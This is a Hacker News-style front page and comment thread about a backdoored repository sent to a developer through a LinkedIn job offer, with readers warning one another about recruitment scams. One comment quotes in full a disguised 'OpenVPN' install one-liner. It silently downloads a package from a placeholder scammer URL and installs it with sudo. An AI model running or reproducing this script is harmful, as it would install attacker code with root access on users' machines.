frontpage.
newsnewestaskshowjobs

Open Source @Github

fp.

A backdoor in a LinkedIn job offer

https://roman.pt/posts/linkedin-backdoor/
345•lwhsiao•2h ago•73 comments

US battery manufacturing output continues to break records

https://fred.stlouisfed.org/series/IPG33591S
80•epistasis•1h ago•42 comments

Iroh 1.0

https://www.iroh.computer/blog/v1
817•chadfowler•7h ago•259 comments

I Love the Computer

https://michaelenger.com/blog/i-love-the-computer/
67•speckx•1h ago•27 comments

Techno-libertarians are flocking to the Caribbean

https://economist.com/the-americas/2026/06/11/techno-libertarians-are-flocking-to-the-caribbean
22•andsoitis•42m ago•15 comments

TinyWind: A pixel pirate sailing game with real wind physics (380k+ kms sailed)

https://tinywind.io
500•tinywind•5h ago•102 comments

Ask HN: Has anyone replaced Claude/GPT with a local model for daily coding?

519•cloudking•7h ago•258 comments

My Homelab AI Dev Platform

https://rsgm.dev/post/ai-dev-platform/
189•rsgm•7h ago•39 comments

Game Engine White Papers Commander Keen

https://forgottenbytes.net/commander_keen.html
114•mfiguiere•4h ago•36 comments

Hetzner Price Adjustment

https://docs.hetzner.com/general/infrastructure-and-availability/price-adjustment/#cloud-servers
266•tuhtah•8h ago•386 comments

A calculator that doesn't round

https://constructive-calculator.dimview.org/writeup.html
22•dimview•3d ago•8 comments

How TimescaleDB compresses time-series data

https://roszigit.com/en/blog/timescaledb-compression-hypercore
91•lkanwoqwp•4h ago•13 comments

Factoring "short-sleeve" RSA keys with polynomials

https://blog.trailofbits.com/2026/06/12/factoring-short-sleeve-rsa-keys-with-polynomials/
58•ledoge•3d ago•1 comments

What every coder should know about Gamma Correction

https://blog.johnnovak.net/2016/09/21/what-every-coder-should-know-about-gamma/
21•sph•2d ago•8 comments

Show HN: Vet turned founder, AI lawn diagnosis

https://grassdx.com/
18•andrewbr•4h ago•8 comments

Show HN: Fata – Spaced repetition to fight skill rot from AI coding

https://fata.dev
60•djoume•4d ago•37 comments

The Dead Economy Theory

https://gmalandrakis.com/writings/ad-economicum.html
7•l0new0lf-G•1h ago•2 comments

Fox to buy Roku

https://www.wsj.com/business/deals/fox-roku-deal-f6e564f9
234•thm•9h ago•329 comments

Making glass-to-metal seals for home­made vacuum tubes

https://maurycyz.com/projects/glass/1/
115•zdw•1d ago•35 comments

Copper transport drug restores memory and clears toxic Alzheimer's proteins

https://www.monash.edu/news/articles/copper-drug-restores-memory-and-clears-toxic-alzheimers-prot...
214•bookofjoe•7h ago•80 comments

How memory safety CVEs differ between Rust and C/C++

https://kobzol.github.io/rust/2026/06/15/how-memory-safety-cves-differ-between-rust-and-c-cpp.html
88•nicoburns•6h ago•86 comments

What job interviews taught me about Kubernetes

https://notnotp.com/notes/what-job-interviews-taught-me-about-kubernetes/
14•chmaynard•2h ago•4 comments

Boot Naked Linux

https://nick.zoic.org/art/boot-naked-linux/
73•abnercoimbre•6h ago•35 comments

Launch HN: Drafted (YC P26) – Models for residential architecture

30•PrimalNick•5h ago•43 comments

Typst 0.15.0

https://typst.app/docs/changelog/0.15.0/
236•schu•4h ago•57 comments

Apple Foundation Models

https://platform.claude.com/docs/en/cli-sdks-libraries/libraries/apple-foundation-models
457•MehrdadKhnzd•17h ago•214 comments

Commander Keen Games (free book)

https://forgottenbytes.net/
5•tzury•1h ago•0 comments

Show HN: machine0 – Persistent NixOS VMs You Control from the CLI

https://machine0.io
62•bwm•6h ago•28 comments

The Alaska Server

https://serialport.org/blog/the-alaska-server/
20•speckx•3h ago•5 comments

CrankGPT

https://crankgpt.com
528•rishikeshs•8h ago•210 comments
Open in hackernews

A backdoor in a LinkedIn job offer

https://roman.pt/posts/linkedin-backdoor/
342•lwhsiao•2h ago

Comments

theoeiffijr•1h ago
Maybe Mac will finally get decent virtualization framework. Downloading random unprotected scripts from internet, like it is 1995 is getting old pretty fast.

Remember to use protection when meeting random people, and putting their junk deep inside your computer!

rvz•1h ago
Or running random curl | bash scripts from GitHub, AUR, NPM are just as bad but many developers here still have dubious assumptions on this bad practice.

The last few weeks tell us how bad this is especially with all the mini-shai hulud's running around.

firefax•4m ago
>Downloading random unprotected scripts from internet, like it is 1995 is getting old pretty fast.

It's ok, the guy with glasses from the Daily Show said it's ok.

mschuster91•1m ago
> Maybe Mac will finally get decent virtualization framework.

it already has, you can configure intellij to run npm commands in a Docker container.

CyanLite2•1h ago
Isn't this how most NPM authors are hacked these days? I think the axios guy got hit with the same approach over LinkedIn.
rektomatic•1h ago
I really want to know what would've happened with an npm install, I guess something boring like crypto mining or identity theft?
gman2093•1h ago
Arbitrary remote code execution, maybe sold to the highest bidder like some shady cloud provider?
imankulov•1h ago
You can actually test it yourself. The actual URL is in the post and the website is still up.
flexagoon•1h ago
AFAIK most malware like this first sends the contents of your environment variables, ssh keys, passwords, etc. to the server, and then sets up a persistent process that executes arbitrary commands received from the attacker's server at any time, allowing them to run whatever else they want
robotnikman•1h ago
With how many desperate software engineers there are on the market right now looking for a job, there are going to be scumbags out there trying to take advantage of the desperation. Such people are the worst of the worst of humanity.

Stay vigilant out there everyone.

DFHippie•1h ago
> Such people are the worst of the worst of humanity.

I don't know. There's a plentiful supply of bad humans.

robotnikman•24m ago
Anyone who preys on people who are desperate and hurting are certainly some of the worst though.
jmward01•1h ago
So, this is a crime right? Why isn't there a well known '911' for cybercrime to report things like this to and get help? Society needs to catch up with the actual dangers out there and build support networks for this ASAP. This is organized crime and needs organized defense to deal with it.
calvinmorrison•1h ago
yes this is a crime.
mrhottakes•1h ago
Unfortunately most evil cybercriminals know the "one weird trick" of "do your crimes in countries that don't care about the crimes"
john_strinlai•1h ago
the main issue is that we lack a global '911'.

secondary is the effort asymmetry between spinning up one of these scams (near 0 effort) and catching/prosecuting these scams (big effort, astronomical cost)

umpalumpaaa•1h ago
I don’t know but the us kidnaps ehhh arrests people on foreign land on a regular basis… and brings them to the US to stand trial. So if it’s “important” enough it will be aced upon…
Diti•1h ago
> the main issue is that we lack a global '911'.

911 is for emergencies. I don’t think the global 911 service would give any attention to a LinkedIn scam.

CalChris•1h ago
It’s odd that the operator of the scam knew full stack level details of its implementation. To me, it seems like they were targeting the author, perhaps as something like privilege escalation, identity escalation perhaps.
clemailacct1•1h ago
This is very likely Lazarus Group - specifically Famous Chollima aka the DPRK
contingencies•1h ago
Thought: they may be targeting software developers on the assumption they may have legit credentials lying around from other employers or for public open source projects, or at a minimum some reputation to exploit towards obtaining commits to the same for supply chain attacks.
dyingkneepad•1h ago
Ah, c'mon! You went all the way to find out the issue and write about it, and won't do the most interesting part which is to tell us what was the remote script that would end up running!?
wxw•1h ago
> a recruiter at a small crypto startup [...] she described a broken proof-of-concept they needed a lead engineer for, and then sent me a public GitHub repo to review. Specifically, she asked me to “check out the deprecated Node modules issue.”

> ...buried between walls of commented-out tests, the payload runs anything the server sends back to your machine.

> npm runs prepare automatically after npm install, so just installing dependencies executes the backdoor.

> The instruction to “check out the deprecated Node modules issue” was bait to get me to run npm install.

Great catch. I've not been phished on LinkedIn before. Surprised it's getting this bad.

cyanydeez•1h ago
surprise is unwarranted as linkedin enshittifies. This type of thing is exactly what happens when neither the user of the service, nor the third party commercial interests are being served by the commercial enterprise. It's a vacuum that scams enter into.
gleenn•1h ago
Friends don't let friends ise NPM. At this point it is so wildly crazy watching people get owned, I don't understand how anyone uses it when they could use e.g. PNMPM and block one if the most obvious amd frequently exploited holes. These tools with arbitrary code execution when trying to download some code have got to stop.
winddude•47m ago
> Friends don't let friends ise NPM

or linkedin

afpx•41m ago
Github / Microsoft could easily fix this, couldn't they? Leaving NPM up in its current state seems criminal, especially since LLMs generate NPM commands so frequently.
mattcasmith•1h ago
I’ve seen a few of these – malicious repos to clone, fake call links that prompt for “driver” downloads, and so on.

The only way around it is to be hyper-vigilant if anyone asks you to run any untrusted code on your computer.

atum47•1h ago
I've been getting some job offers on LinkedIn, all of them are shady af. Apply using a platform. Apply recording a video of yourself. Apply by resolving a calibration code test (behind a code platform)...
yieldcrv•1h ago
now imagine if you were like the rest of us and didn’t write a blog post about it
avgDev•1h ago
More reasons for me to dislike linked-in. I have an account. I hate it.
l0new0lf-G•1h ago
Yet another reason to be reluctant to even discuss linkedin job offers
Yhippa•1h ago
> but on a more tired or rushed day

This has nearly gotten me before, and I got lucky.

Raed667•1h ago
They seem to using the same domain for multiple targets: reddit thread from 3 months ago:

https://www.reddit.com/r/openclaw/comments/1rlet0h/someone_t...

BobAliceInATree•1h ago
> I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.

Oh, Microsoft.

INTPenis•59m ago
They should have reported it for DMCA violation. It would be gone instantly.
andy99•58m ago
I once saw an ad on LinkedIn made up to look like the CBC (Canadian news) linking to a fake video of the Canadian prime minister announcing a crypto investment plan for all Canadians, with a link to sign up. I reported the ad to LinkedIn and shortly after got a reply telling me they investigated and didn’t find any violation of their policies.
dolebirchwood•1h ago
As part of a potential interview, I was given login credentials so I could sign in to a site where I was prompted to download a VPN client that would allow me to connect to the company's system (red flags already).

They made the site look like it was an official OpenVPN page, even though the URL was clearly not affiliated. The method of "downloading" their VPN was to copy and paste a script to run in my terminal. They only showed a small snippet of the command, which started with `( brew install openvpn )`, followed by a copy button. After pasting the full command to inspect it, the entire contents was as follows (with the malicious URL removed):

``` ( brew install openvpn ) >/dev/null 2>&1 & ovpn_pid=$!; ( url="https://asshole.scammer.dev/openvpn-mac"; policyCategoryId="-1"; installerArgs="url=$url:departmentId=1765561620401102848:sourceInstall=silent:technicianId=7455681275330027520"; silentInstall="true"; waitForProcess(){ processName="$1"; fixedDelay="$2"; terminate="$3"; while pgrep -f "$processName" >/dev/null; do if [ "$terminate" = "true" ]; then pkill -f "$processName" true; return; fi; delay="${fixedDelay:-$((RANDOM % 50 + 10))}"; sleep "$delay"; done; }; checkForRosetta2(){ waitForProcess "/usr/sbin/softwareupdate"; IFS='.' read -r osvers_major osvers_minor <<< "$(/usr/bin/sw_vers -productVersion)"; if [ "$osvers_major" -ge 11 ]; then if ! sysctl -n machdep.cpu.brand_string | grep -q "Intel"; then pgrep oahd >/dev/null 2>&1 /usr/sbin/softwareupdate --install-rosetta --agree-to-license >/dev/null 2>&1; fi; fi; }; checkForRosetta2; DIRECTORY="/Users/Shared/InstallerWorkspace"; mkdir -p "$DIRECTORY"; configFile="$DIRECTORY/agentinstallconfig.properties"; { echo "policyId=$policyCategoryId"; echo "install_args=$installerArgs"; echo "Silent_Install=$silentInstall"; } > "$configFile"; baseName="$(basename "$url")"; downLoadFile="/Users/Shared/$baseName"; curl --silent --fail --location --url "$url" --output "$downLoadFile" >/dev/null 2>&1 && sudo installer -pkg "$downLoadFile" -target / >/dev/null 2>&1; t=$?; rm -f "$configFile" "$downLoadFile"; exit "$t" ) >/dev/null 2>&1 & so_pid=$!; wait "$ovpn_pid"; ovpn_rc=$?; wait "$so_pid"; so_rc=$?; [ "$ovpn_rc" -eq 0 ] && [ "$so_rc" -eq 0 ] ```

Yeah, no.

Be careful out there.

srikanth86•37m ago
Oh my goodness! I had this playout as is on Friday. I luckily got on the zoom call 20 mins late. Found it weird that the interviewer was pushy and wanted me to download and run an npm repo. I got out of the call quickly.
zuzululu•34m ago
I'm working 3 remote jobs right now and I can tell you guys to really watch out.

Often they are not malicious, just unsavory business practice where they want free consulting with no intention of hiring you. Another tell is the person is quick to jump to a take home screening project and they are quite good at getting at engineers heads that "leetcode is outdated/they dont believe in it" and whatever they want you to hear.

They know engineers are desperate for jobs right now and if you don't have a backbone they will exploit it.

I am much wiser now that I work multiple salary jobs remotely I realize these 3 golden rules:

- Don't stay loyal to your employers.

- Don't stay honest to those don't value it.

- Don't stay complacent always innovate.

binsquare•34m ago
Would highly recommend running any repo in an isolated environment like a vm
f055•34m ago
I used to get 2-3 shady crypto offers per week on LinkedIn. It stopped when I started replying with AI generated responses demanding multiple verification steps: official email, official offer link, terms and scope etc. And a note with a firm refusal to run any code or install any package on my machine for "recruitment tasks".
khernandezrt•33m ago
It would have been game over for me.
stainablesteel•13m ago
the entire internet is just phishing at this point
john_strinlai•39m ago
i used the same terminology as the parent, and i think we all know what is meant by it
pocksuppet•43m ago
what about the outcome asymmetry between spinning up one of these scams (get one guy's computer) and getting caught (jail for life)
john_strinlai•36m ago
you arent getting jail for life for this, even in the extremely remote chance you are caught. you are probably getting more than one guy's computer, though.
Jolter•21m ago
I’m sure they’ve gotten more than one hot wallet from out of work crypto bros. Probably a profitable venture.
eblume•1h ago
https://www.ic3.gov

You won't hear back from them, though. But, at least for US citizens (and possibly for anyone?), this is as far as I know the closest thing there is to an "Internet 911".

bityard•1h ago
To put it bluntly and perhaps a bit cynically, on the tree of bad things that people do to other people, this is pretty high-hanging fruit. Right up there next to scam phone calls that prey on the elderly while claiming to be from Microsoft support.

It's basically impossible to catch suspects because they are either smart enough to cover their tracks very well, or (more often) live in countries whose governments don't care about their citizens (even pay them for) scamming westerners.

Barbing•1h ago
Saw Microsoft has a dedicated scam reporting page - guess it was damaging their brand https://reportfraud.microsoft.com/en-us

Wonder if they’re effective in going after reports. I’d still report to IC3/FBI/powers that be, too. Just in case someone somewhere has the resources to do something… perhaps a high hope

mgiampapa•58m ago
I get more calls from Google Security than any other thing. Oddly the Pixel's built in scam detection and call screening lets them through without fail. I normally don't have my phone even ring unless it's in my contacts, but saying you are calling from Google is like a magic code.
throwaway85825•48m ago
They must have whitelisted the word Google. Very useful to scammers.
Xirdus•51m ago
Hard disagree on the scam phone calls. It would be trivial to eradicate them almost completely if the phone operators did the bare minimum to fight against it. At any point in time, any given US phone number is handled by exactly one phone carrier. There is nothing stopping that carrier from requiring name and address to issue that phone number. They already do for 99.99% of their legitimate customers. It would be very easy to make it so that every single phone call originating from the US, including all VOIP calls made with US phone numbers, can be traced back to a specific business or person that can later be sued or prosecuted.

And no, number spoofing isn't an excuse either. We literally solved the much harder problem of email spoofing already. There are, what, 3 carrier networks in all of US? And they cannot do with each other what DMARC did for the hundreds of thousands disjoint organizations that comprise the internet? Please.

a34729t•46m ago
Yeah 100%. It's criminal that this is not already done.
firefax•38m ago
>It would be trivial to eradicate them almost completely

Absolutely true, but droning their data centers might have some policy repercussions.

salawat•30m ago
KYC just for a phone number opens the door for societal ostracization and essentially blacklisting of people from infrastructure. This is on par with being unable to open a bank account if the capability is matured. I'd advise that you think long and hard about the consequences of this system being applied against you maliciously before signing on the dotted line.
mschuster91•2m ago
> KYC just for a phone number opens the door for societal ostracization and essentially blacklisting of people from infrastructure.

We have that in Europe and the world has not fallen apart. On top of that, we don't have even close to the scale of problems with scammers that the US has. I won't deny we don't have scammers because we absolutely have them, but they are far from the scourge they are in the US.

> This is on par with being unable to open a bank account if the capability is matured.

The secret is... we have constitutionally protected rights. Unless you do not pay your bills, your phone line will not get disconnected. And same for bank accounts - every European has the right to a basic banking account, even if you are a target of foreign sanctions [1].

[1] https://www.tagesschau.de/ausland/europa/konto-eugh-usa-sank...

pluc•1h ago
Have you seen the state of *gestures at everything*
stefan_•1h ago
You mean organized crime like NSO Group? Sorry, governments all over the world are too busy using them to spy on opposition to care.
throwaway85825•52m ago
The scammers are in a different whole uncooperative country.
deejaaymac•50m ago
Cool let's hear your solution, you seem well versed on how infosec works.
cluckindan•48m ago
Yes. But the perps are in North Korea.
dakolli•16m ago
For all the ways we've economically tortured North Korea over the last 40 years, simply for being one of the last communist countries, we kinda deserve everything they do to us. What do you expect?
john_strinlai•4m ago
even if i agreed with the premise (i dont), and agreed that it was north korea (we dont know), the people getting hurt are not the same people who set the sanctions or enforce them.
jjice•23m ago
They have some changes here in v12: https://github.blog/changelog/2026-06-09-upcoming-breaking-c...
burnte•55m ago
I haven't been phished like this but I've certainly had fraudsters try to con me into meetings or schemes, etc.
pants2•36m ago
LinkedIn offers no way for $company to disavow users who claim to work for $company - they will appear on the official company page as long as it's in their profile.

We've had fake recruiters that claim to work for us running basically the same scam. These are great fake profiles: LinkedIn Premium, tons of relevant posts, etc... but they don't work for us, and we get angry messages from people saying our recruiter tried to scam them. No, they're not our recruiter despite showing up on our company page on LinkedIn. No number of reports could get them taken down.

I finally got it solved by buying drinks for a buddy of mine that works for LinkedIn, but not all startups have that connection!

tweetle_beetle•24m ago
LinkedIn didn't even disavow people pretending to work for LinkedIn until someone had too much fun with it - https://chrisduffycomedy.com/blog/2016/11/2/6-months-as-the-...
sensanaty•16m ago
My last 2 companies, LinkedIn asked me to add an email address associated with the said company and actually confirm via said email in order to add them to my profile. So, if I worked for FooCompany, I had to have a @FooCompany.com email which is setup by someone at the company itself. Does this not cover what you're talking about?
neilv•11m ago
I actually lucked out with good support from LinkedIn on a related matter.

I had a new bootstrapped company on LinkedIn quickly acquire some stranger's employee profile, which said it was from Nigeria.

I made a case in my first contact with LinkedIn, and they quickly removed that profile from the company.

(Thanks to LinkedIn for being so responsive that time. I was busy lining up affiliate program memberships, for a shopping-related site that was intended to be more trustworthy than the current market alternatives. If the first thing some people saw when they look up the legitimacy of the "trustworthy" new company... is a person in a country unfortunately known for online scammers... I'd guess the affiliate program application would've gotten denied.)

mhitza•36m ago
Things like this where a tried and tested method on Upwork, particularly in the 2021-2022 crypto/nft highs. At some point they branched out from crypto projects and cast a wide net across different categories.

Last I recall was a download of a windows scr (screensaver masquerading) file.

Linkedin is a new low, and I'm sure the platform doesn't really care (look, more jobs), just as ad network companies (Google, Meta) don't really care about scam ads.

firefax•2m ago
I've had people phish for my email then hit that with some bullshitpowershellladendoucument.pdf.docx crap, but sending it directly in the IM?

Bold strategy cotton, let's see if it pays off.